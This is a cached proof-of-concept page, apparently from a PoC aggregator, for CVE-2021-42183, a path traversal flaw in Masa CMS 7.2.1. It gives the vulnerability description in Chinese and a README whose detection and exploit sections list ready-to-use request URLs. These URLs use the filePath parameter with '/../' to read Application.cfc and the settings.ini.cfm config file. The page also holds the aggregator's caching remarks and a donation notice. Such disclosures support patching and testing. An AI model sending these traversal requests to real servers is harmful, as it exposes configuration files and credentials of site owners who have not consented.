CVE-2021-42183 PoC — Masa CMS 路径遍历漏洞

Source

https://github.com/0xRaw/CVE-2021-42183

Associated Vulnerability

Title:Masa CMS 路径遍历漏洞 (CVE-2021-42183)
Description:Masa CMS是MasaCMS的一个数字体验平台。 Masa CMS 7.2.1版本存在安全漏洞，该漏洞源于/index.cfm/_api/asset/image/缺少对于路径参数的转义导致路径遍历漏洞。

Readme

# CVE-2021-42183

MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/.

# Detection

```
If this file is readable it means the vulnerablilty exists.
https://example.com/index.cfm/_api/asset/image/?filePath=/Application.cfc
```


# Exploit

```
https://example.com/index.cfm/_api/asset/image/?filePath=/../<Path>
- Read The Config File
https://example.com/index.cfm/_api/asset/image/?filePath=/../config/settings.ini.cfm 
```

## Tested On 
MasaCMS 7.2.1

## Vendor

http://www.masacms.com

https://github.com/MasaCMS/MasaCMS
https://github.com/MasaCMS/MasaCMS/blob/01e0636db0ea4c132906724e1b0772c86e263ada/core/mura/content/file/fileManager.cfc#L368


## Discoverd By:

Rawi And BassamAssiri.

File Snapshot


 [4.0K]  /data/pocs/1455418cb06d2f95ba2f50851de20148233f9cb5
└── [ 733]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!